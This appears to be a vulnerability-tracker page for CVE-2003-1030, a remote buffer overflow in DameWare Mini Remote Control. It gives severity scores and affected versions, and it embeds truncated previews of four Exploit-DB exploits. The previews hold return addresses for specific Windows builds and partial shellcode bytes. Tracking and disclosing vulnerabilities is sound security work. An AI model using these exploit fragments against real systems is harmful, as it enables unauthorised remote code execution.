CVE-2003-1030
published 2004-02-17CVE-2003-1030: Buffer overflow in DameWare Mini Remote Control before 3.73 allows remote attackers to execute arbitrary code via a long pre-authentication request to TCP port…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
17.27%
96.7th percentile
Buffer overflow in DameWare Mini Remote Control before 3.73 allows remote attackers to execute arbitrary code via a long pre-authentication request to TCP port 6129.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DameWare Mini Remote Control Server 3.7x - Buffer Overflow (3)
exploitdb·2003-12-16
CVE-2003-1030 DameWare Mini Remote Control Server 3.7x - Buffer Overflow (3)
DameWare Mini Remote Control Server 3.7x - Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/9213/info
A problem has been identified in the handling of pre-authentication packets by DameWare Mini Remote Control Server. Because of this, it may be possible for a remote attacker to gain unauthorized access to hosts using the vulnerable software.
/**************************************************************************************/
/* [Crpt] DameWare Mini Remote Control
#include
#include
#include
#pragma comment (lib,"ws2_32")
/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4
*/
#define RET_XP_VAR0 "\x07\xD5\x36\x77"
#define RET_XP_VAR1 "\xC1\x1C\x35\x77" // these o
Exploit-DB
DameWare Mini Remote Control Server 3.7x - Buffer Overflow (2)
exploitdb·2003-12-16
CVE-2003-1030 DameWare Mini Remote Control Server 3.7x - Buffer Overflow (2)
DameWare Mini Remote Control Server 3.7x - Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/9213/info
A problem has been identified in the handling of pre-authentication packets by DameWare Mini Remote Control Server. Because of this, it may be possible for a remote attacker to gain unauthorized access to hosts using the vulnerable software.
/**************************************************************************************/
/* [Crpt] DameWare Mini Remote Control
#include
#include
#include
#pragma comment (lib,"ws2_32")
/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4
// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv
Exploit-DB
DameWare Mini Remote Control Server 3.7x - Buffer Overflow (1)
exploitdb·2003-12-16
CVE-2003-1030 DameWare Mini Remote Control Server 3.7x - Buffer Overflow (1)
DameWare Mini Remote Control Server 3.7x - Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/9213/info
A problem has been identified in the handling of pre-authentication packets by DameWare Mini Remote Control Server. Because of this, it may be possible for a remote attacker to gain unauthorized access to hosts using the vulnerable software.
/*******************************************************************************
*
* DameWare Remote Control Server Stack Overflow Exploit
*
* Discovered by: wirepair
* Exploit by: Adik [ netmaniac (at) hotmail.KG ]
*
* Vulnerable Versions:
#include
#include
//#include "netmaniac.h"
#pragma comment(lib,"ws2_32")
#define ACCEPT_TIMEOUT 10
#define RECVTIMEOUT 15
#define ID_UNKNOWN 0
#define ID_WIN2K 1
#define ID_WINXP 2
#define
Exploit-DB
DameWare Mini Remote Control Server - System
exploitdb·2003-08-13
CVE-2003-1030 DameWare Mini Remote Control Server - System
DameWare Mini Remote Control Server - System
---
/*
DameWare Mini Remote Control Server Local SYSTEM Exploit
Vulnerable Versions Prior to 3.71.0.0 by [email protected]
This code is based on shards.cpp by xenophile
*/
#define WIN32_LEAN_AND_MEAN
#include
#include
#pragma warning(disable: 4305)
#pragma warning(disable: 4309)
void MakeShellCode (char *buffer)
{
HMODULE hCRT;
void * lpSystem;
int count=0;
while (count < 36)
{
buffer [count] =0x90;
count ++;
}
buffer[37]=0x8B; buffer[38]=0xE5; buffer[39]=0x55;
buffer[40]=0x8B; buffer[41]=0xEC; buffer[42]=0x33;
buffer[43]=0xFF; buffer[44]=0x90; buffer[45]=0x57;
buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04;
buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8;
buffer[52]=0x63; buffer[53]=0xC6; buffer [54]=0x45;
buffer[55]=0xF9; buffe
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=107152094119279&w=2http://marc.info/?l=bugtraq&m=107187110617266&w=2http://marc.info/?l=bugtraq&m=107392603615840&w=2http://sh0dan.org/files/dwmrcs372.txthttp://www.kb.cert.org/vuls/id/909678http://www.securityfocus.com/bid/9213https://exchange.xforce.ibmcloud.com/vulnerabilities/14001http://marc.info/?l=bugtraq&m=107152094119279&w=2http://marc.info/?l=bugtraq&m=107187110617266&w=2http://marc.info/?l=bugtraq&m=107392603615840&w=2http://sh0dan.org/files/dwmrcs372.txthttp://www.kb.cert.org/vuls/id/909678http://www.securityfocus.com/bid/9213https://exchange.xforce.ibmcloud.com/vulnerabilities/14001
2004-02-17
Published